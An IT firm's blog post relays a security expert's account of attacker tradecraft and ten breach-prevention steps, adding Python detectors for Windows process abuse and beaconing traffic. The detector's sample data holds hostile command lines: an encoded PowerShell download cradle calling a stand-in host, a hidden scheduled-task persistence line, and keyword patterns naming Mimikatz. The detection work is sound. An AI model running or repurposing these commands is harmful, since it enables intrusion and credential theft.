10 ways to prevent breaches and minimise impact

Attackers are continually adapting to security technologies to fly under the radar, but taking action in 10 key areas can reduce the risk of breaches and minimise their impact, according to a resilience expert.

According to Jibran Ilyas, vice-president of cyber resilience at Stroz Friedberg, attackers are increasingly able to avoid detection by adapting their methods to the tools security defenders are using.

Ilyas told a conference in Vancouver, Canada, this year that a good example of this is attackers relying less on malware and instead using administrative tools that are built into operating systems such as Microsoft Windows.

“Attackers are using tools like PowerShell to launch attacks rather than malware, and as a result they are going undetected because no security technology is going to block a legitimate administration tool.”

Likewise, fewer attackers are maintaining round-the-clock communications with their command and control servers, so as to avoid detection by security tools that monitor for this type of traffic.

“Because attackers are finding it relatively easy to get into networks, they are going in, moving laterally, finding the data they are interested in, exfiltrating it and then shutting down operations without using any malware at all,” said Ilyas.

Attackers are also developing anti-forensics techniques, he said, by working out which artefacts investigators' tools rely on and then either avoiding creating those artefacts or making sure they are wiped as part of the attack.

Ilyas said that increasingly common ways into organisations include phishing sent from the compromised email accounts of a target's friends, partners, clients and colleagues, and phishing sent through subscribed mailing lists that recipients tend to trust.

Stroz Friedberg is also seeing attackers use publicly available information from a wide range of sources to reset account passwords and take control of accounts, or to create subdomains under legitimate organisations' domains to trick people into handing over their usernames and passwords.

“This is why it is becoming critical to use at least two-factor authentication to stop attackers from accessing accounts to send phishing emails or to hack domain registrars to manipulate subdomains,” said Ilyas.

Cyber defenders also need to be aware that attackers are increasingly breaching branch or overseas office networks, from which they use a variety of methods to hop across to the main network, and that they are exploiting undisclosed vulnerabilities in publicly accessible portals, such as password reset portals.

Stroz Friedberg's cyber resilience team is seeing attackers use webshells on web servers to send commands, tools such as Mimikatz and Mimikittenz to extract passwords from a computer's memory, the Task Scheduler to execute commands, tunnelling tools such as the Tunna webshell on a compromised web server to pivot around networks, and signed binaries to run malicious code from dynamic link libraries (DLLs).
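The tradecraft described above (PowerShell in place of malware, a webshell driving a web server, the Task Scheduler as an execution mechanism, signed binaries loading attacker-supplied DLLs) shares a property: the binary that runs is legitimate, so the detection has to look at how it was invoked and what spawned it rather than at what it is. The following is an added example and not code from the article, from Stroz Friedberg or from any product named on the page: a Python triage routine run over constructed process-creation events shaped like Sysmon Event ID 1 or Security 4688 records. The field names (ParentImage, Image, CommandLine), the keyword lists and the sample events are assumptions made for illustration.

```python
"""Triage Windows process-creation telemetry for living-off-the-land tradecraft.

Added example; not code from the article, from Stroz Friedberg or from any product
it names. Each event is a dict shaped like a Sysmon Event ID 1 / Security 4688
record (ParentImage, Image, CommandLine); field names, keyword lists and the
sample events below are constructed for illustration.
"""
import base64
import re

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
OFFICE = {"winword.exe", "excel.exe", "outlook.exe"}
# Signed, built-in binaries that will load or run code handed to them. Blocking them
# breaks administration, so the checks below look at *how* they are invoked.
PROXY_BINS = {"rundll32.exe", "regsvr32.exe", "mshta.exe"}
# Locations an ordinary user can write to; a signed binary loading code from here is suspect.
USER_WRITABLE = re.compile(r"(?i)\\(users\\[^\\]+\\|programdata\\|windows\\temp\\|temp\\)")
URL = re.compile(r"(?i)https?://")
CRADLE = re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression")
CRED_TOOLS = re.compile(r"(?i)mimikatz|mimikittenz|sekurlsa::")
# powershell.exe accepts any unambiguous prefix of -EncodedCommand; these are the common spellings.
ENCODED = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def decode_encoded_command(cmdline):
    """Decode a -EncodedCommand argument (Base64 of UTF-16LE text); None if absent or malformed."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage(event):
    """Return the list of reasons this event looks like abuse of legitimate tooling."""
    image = basename(event["Image"])
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    reasons = []
    if parent == "w3wp.exe" and image in SHELLS:          # IIS worker never needs a shell
        reasons.append("IIS worker process spawned a shell (webshell)")
    if parent in OFFICE and image in SHELLS:              # classic phishing foothold
        reasons.append(f"{parent} spawned {image} (document or mail lure)")
    if image in {"powershell.exe", "pwsh.exe"}:
        script = decode_encoded_command(cmd)
        if script is not None:
            reasons.append("encoded PowerShell: " + script[:60])
            cmd += " " + script                           # inspect the decoded payload too
        if CRADLE.search(cmd):
            reasons.append("PowerShell download cradle or in-memory execution")
    if image in PROXY_BINS and (USER_WRITABLE.search(cmd) or URL.search(cmd)):
        reasons.append(f"{image} loading code from a user-writable path or URL")
    if image == "schtasks.exe" and "/create" in cmd.lower() and any(s in cmd.lower() for s in SHELLS):
        reasons.append("scheduled task created to launch a shell")
    if CRED_TOOLS.search(cmd):                            # renamed copies need memory/handle telemetry
        reasons.append("credential-dumping tool named on the command line")
    return reasons

def flagged(events):
    """(index, reasons) for every event that produced at least one reason."""
    hits = []
    for i, e in enumerate(events):
        reasons = triage(e)
        if reasons:
            hits.append((i, reasons))
    return hits

def encode_ps(script):
    """Encode a script the way attackers do for -EncodedCommand (used to build the samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample events; not real telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc "
     + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')")},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\alice\AppData\Local\Temp\upd.dll,Start"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks.exe /create /tn Updater /tr "powershell.exe -w hidden -f C:\ProgramData\u.ps1" /sc minute /mo 30'},
    {"ParentImage": r"C:\Windows\explorer.exe",  # benign: an administrator at an interactive prompt
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-Service"},
]

if __name__ == "__main__":
    for i, reasons in flagged(SAMPLE_EVENTS):
        print(f"event {i}: " + "; ".join(reasons))
```

The four attacker events are flagged and the administrator's interactive `Get-Service` is not, even though the same powershell.exe runs in both cases. That is the practical counter to the point that no product will block a legitimate administration tool: the tool is left alone, and the parent process, the decoded command and the location the code is loaded from carry the signal. The keyword lists are deliberately small; a production rule set would be tuned against the organisation's own baseline of administrative activity.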

Steps to improve cyber security

In the face of these challenges, Ilyas said cyber defenders can prevent intrusions and minimise the impact in 10 key ways:

  1. There needs to be a mindset shift. Organisations need to understand that if they have any data of value, attackers will come after them. “Having a protection plan of highest risk assets is one thing, but organisations need to ask if they can detect unauthorised access to the assets,” said Ilyas.
  2. Know where there is a security risk. “We often hear that organisations are unaware of the existence of a server or that it contained sensitive data,” said Ilyas.
  3. Organisations need to understand that it is not enough to secure the data on servers, because there is a lot of sensitive data on endpoints. According to Ilyas, organisations often overlook data in emails, spreadsheets, browser-saved passwords and session cookies.
  4. Avoid single-factor authentication, not just for main VPN access but for any other public portals an organisation has, such as Outlook Web Access (OWA).
  5. Consider advanced threat detection systems to get more context on threats. “Remember, real attacks start when attackers get inside the environment and pose like insiders,” said Ilyas.
  6. Avoid burnout for cyber security administrators. “When you hire top talent for security innovations, don’t give them the day to day that consumes most of their time,” he said, adding that continuity in a security team is a good thing, as it ensures defenders know as much as or more than attackers about their IT environment, rather than the other way around.
  7. Pay attention to systems that have propagation capabilities. “This includes security tools like antivirus servers, Microsoft SCCM and file integrity management servers because attackers like to use a victim’s security tools against them,” said Ilyas.
  8. Whitelisting systems are not enough on their own. “Defenders need to understand what built-in Windows applications could cause them harm,” said Ilyas.
  9. Monitor logs like you mean it, not just for compliance. “Network metadata should be retained for monitoring and investigations. Tuning of SIEM [security information and event management] systems should be an ongoing project,” said Ilyas.
  10. Invest in a threat hunting programme to search proactively for attackers’ tactics, techniques and procedures. “The goal should be to stop attackers before they complete the full attack,” said Ilyas.
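Point 9's advice to retain network metadata, and the earlier observation that attackers are cutting back on round-the-clock command-and-control traffic because defenders watch for it, can be made concrete with a timing check over connection records. The following is an added example and not code from the article or from Stroz Friedberg: it groups flow records by source and destination, measures how regular the gaps between connections are, and reports host pairs whose timing is machine-like. The record layout (epoch seconds, source, destination), the jitter threshold, the minimum sample size and the sample records are assumptions made for illustration; the data is constructed, not captured traffic.

```python
"""Score connection metadata for command-and-control beaconing.

Added example; not code from the article or from Stroz Friedberg. Input is a list of
(timestamp_seconds, source, destination) tuples such as a firewall or NetFlow export
would provide. Thresholds and the sample records are constructed for illustration.
"""
from collections import defaultdict
from statistics import mean, median, pstdev


def intervals(timestamps):
    """Gaps in seconds between consecutive connections of one host pair."""
    ts = sorted(timestamps)
    return [b - a for a, b in zip(ts, ts[1:])]

def beacon_score(timestamps, min_connections=8):
    """Return (median_gap, jitter_ratio), or None when there are too few connections.

    jitter_ratio is the standard deviation of the gaps divided by their mean. An
    implant checking in on a timer with light jitter scores well below 1; human
    browsing is bursty and scores far above it.
    """
    if len(timestamps) < min_connections:
        return None
    gaps = intervals(timestamps)
    avg = mean(gaps)
    if avg == 0:
        return None
    return median(gaps), pstdev(gaps) / avg

def find_beacons(records, max_jitter=0.2, min_connections=8):
    """Host pairs whose connection timing is regular enough to look like a beacon."""
    by_pair = defaultdict(list)
    for ts, src, dst in records:
        by_pair[(src, dst)].append(ts)
    hits = {}
    for pair, ts in by_pair.items():
        score = beacon_score(ts, min_connections)
        if score is not None and score[1] <= max_jitter:
            hits[pair] = score
    return hits

def constructed_records():
    """Constructed flow records (epoch seconds, source, destination); not real traffic."""
    base = 1_700_000_000
    recs = []
    # An implant checking in every 300 s with a few seconds of jitter.
    for i, jitter in enumerate([0, 3, -2, 5, -4, 1, 0, -3, 4, -1, 2, -5]):
        recs.append((base + 300 * i + jitter, "10.0.5.23", "203.0.113.7"))
    # A user browsing a web server: clusters of requests separated by long pauses.
    for offset in [0, 1, 2, 4, 900, 901, 903, 2500, 2501, 5000, 5003, 7200]:
        recs.append((base + offset, "10.0.5.23", "198.51.100.10"))
    # Low-and-slow: one connection a day never reaches the minimum sample size.
    for day in range(3):
        recs.append((base + 86400 * day, "10.0.7.41", "203.0.113.9"))
    return recs

if __name__ == "__main__":
    for (src, dst), (gap, jitter) in find_beacons(constructed_records()).items():
        print(f"{src} -> {dst}: median gap {gap}s, jitter ratio {jitter:.3f}")
```

Only the 300-second implant is reported; the bursty browsing fails the jitter threshold and the host that connects once a day never accumulates enough samples. That last case is exactly the evasion Ilyas describes: an attacker who checks in rarely stays under a periodicity check unless the metadata is retained long enough to accumulate the samples, which is the reason the retention advice in point 9 matters. Lowering `min_connections` or raising `max_jitter` catches slower or noisier beacons at the cost of more false positives, so the thresholds are a tuning decision against the organisation's own traffic, not fixed constants.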

At TIVA IT Solutions Ltd we can provide support and assistance in these areas. With the General Data Protection Regulation coming into force on 25 May 2018, don’t delay: call us in the office on 01252 350690 and we can talk you through how we can help.